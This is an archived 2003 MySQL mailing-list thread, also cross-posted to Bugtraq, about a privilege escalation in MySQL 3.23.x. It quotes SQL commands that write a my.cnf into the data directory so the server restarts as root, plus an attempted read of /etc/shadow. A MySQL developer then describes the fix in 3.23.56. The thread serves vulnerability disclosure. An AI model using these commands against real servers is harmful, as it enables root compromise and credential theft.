Re: MySQL user can be changed to root

Re: MySQL user can be changed to root

am 10.03.2003 18:13:48 von gyst

I can confirm this privilege escalation in mysql-server 3.23.49-8.2
(debian/stable on linux/i386). Any mysql user with file privileges can trick
the mysql server into running as root on restart of the mysql subsystem.

Note that mysql prevents you from reading non-world-readable files outside
the mysql data directory, or overwriting existing files. You can create new
files as root, though.

mysql> load data infile '/etc/shadow' into table readtext;
ERROR 1085: The file '/etc/shadow' must be in the database directory or be
readable by all
mysql> select * into outfile '/etc/somenewfile' from hack;
Query OK, 2 rows affected (0.00 sec)

-rw-rw-rw- 1 root root 19 Mar 10 17:22 /etc/somenewfile

Not a rootshell, yet, but lots of new avenues from here.

:*CU#



bugsman@libero.it wrote:

> mysql>SELECT * INTO OUTFILE '/path/to/mysql/datadir/my.cnf' FROM hack

> Now, when the mysql server will be restarted, the user option in our
> datadir my.cnf will override the one in /etc/my.cnf and mysql server will
> run as root



--
*** Guido A.J. Stevens *** mailto:obfuscated ***
*** NFG Net Facilities Group BV *** tel: +31.43.3618933 ***
*** Postbus 1143 *** fax: +31.43.3561655 ***
*** 6201 BC Maastricht *** http://www.nfg.nl ***

.... merging human DNA with cow eggs, creating a human-cow embryo. A
Chinese scientist is working with human-rabbit combinations. Cow and
rabbit eggs are far cheaper than human eggs ...
[ http://www.latimes.com/news/nationworld/nation/la-051202pate nt.story ]



------------------------------------------------------------ ---------
Before posting, please check:
http://www.mysql.com/manual.php (the manual)
http://lists.mysql.com/ (the list archive)

To request this thread, e-mail bugs-thread13932@lists.mysql.com
To unsubscribe, e-mail

Re: MySQL user can be changed to root

am 10.03.2003 20:08:38 von Sergei Golubchik

Hi!

Both to bugtraq and mysql list:

This issue has been adressed in 3.23.56 (release build is started
today), and some steps were taken to alleviate the threat.

In particular, MySQL will no longer read config files that are
world-writeable (and SELECT ... OUTFILE always creates world-writeable
files). Also, unlike other options, for --user option the first one will
have the precedence. So if --user is set in /etc/my.cnf (as it is
recommended in the manual), datadir/my.cnf will not be able to override
it.

Fixing this issue in more robust way would mean introducing too big and
incompatible changes into stable version, thus breaking lots of
installations. It is to be done in 4.1.

Regards,
Sergei

On Mar 10, Guido A.J. Stevens wrote:
>
> I can confirm this privilege escalation in mysql-server 3.23.49-8.2
> (debian/stable on linux/i386). Any mysql user with file privileges can
> trick the mysql server into running as root on restart of the mysql
> subsystem.
>
> bugsman@libero.it wrote:
>
> > mysql>SELECT * INTO OUTFILE '/path/to/mysql/datadir/my.cnf' FROM hack
>
> > Now, when the mysql server will be restarted, the user option in our
> > datadir my.cnf will override the one in /etc/my.cnf and mysql server will
> > run as root

--
MySQL Development Team
__ ___ ___ ____ __
/ |/ /_ __/ __/ __ \/ / Sergei Golubchik
/ /|_/ / // /\ \/ /_/ / /__ MySQL AB, http://www.mysql.com/
/_/ /_/\_, /___/\___\_\___/ Osnabrueck, Germany
<___/

------------------------------------------------------------ ---------
Before posting, please check:
http://www.mysql.com/manual.php (the manual)
http://lists.mysql.com/ (the list archive)

To request this thread, e-mail bugs-thread13934@lists.mysql.com
To unsubscribe, e-mail